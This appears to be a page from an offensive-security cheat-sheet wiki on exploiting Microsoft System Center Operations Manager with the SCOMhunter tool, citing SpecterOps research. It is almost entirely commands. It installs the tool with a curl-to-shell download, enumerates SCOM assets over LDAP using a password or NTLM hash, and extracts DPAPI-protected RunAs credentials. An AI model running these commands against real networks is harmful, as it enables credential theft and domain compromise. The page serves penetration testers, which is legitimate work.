SCOM

System Center Operations Manager (SCOM) exploitation.

Sources: https://specterops.io/blog/2025/12/10/scommand-and-conquer-attacking-system-center-operations-manager-part-1/ and https://specterops.io/blog/2025/12/10/scommand-and-conquer-attacking-system-center-operations-manager-part-2/

Install SCOMhunter

# Link to the tool (https://github.com/garrettfoster13/scomhunter)
curl -LsSf https://astral.sh/uv/install.sh | sh
git clone https://github.com/garrettfoster13/scomhunter
cd scomhunter
uv sync

Enumerate LDAP for SCOM assets

# With a password
uv run scomhunter.py find -u <USERNAME> -p '<PASSWORD>' -d <DOMAIN-FQDN> -dc-ip <DC-IP>
# With an NTLM hash
uv run scomhunter.py find -u <USERNAME> -hashes <NTLM-HASH> -d <DOMAIN-FQDN> -dc-ip <DC-IP>

Extract DPAPI protected RunAs credentials (domain admin required)

# With a password
uv run scomhunter.py dpapi -u <USERNAME> -p '<PASSWORD>' -d <DOMAIN-FQDN> -dc-ip <DC-IP>

# With an NTLM hash
uv run scomhunter.py dpapi -u <USERNAME> -hashes <NTLM-HASH> -d <DOMAIN-FQDN> -dc-ip <DC-IP>

PreviousSCCM NextBloodhound

Last updated 25 days ago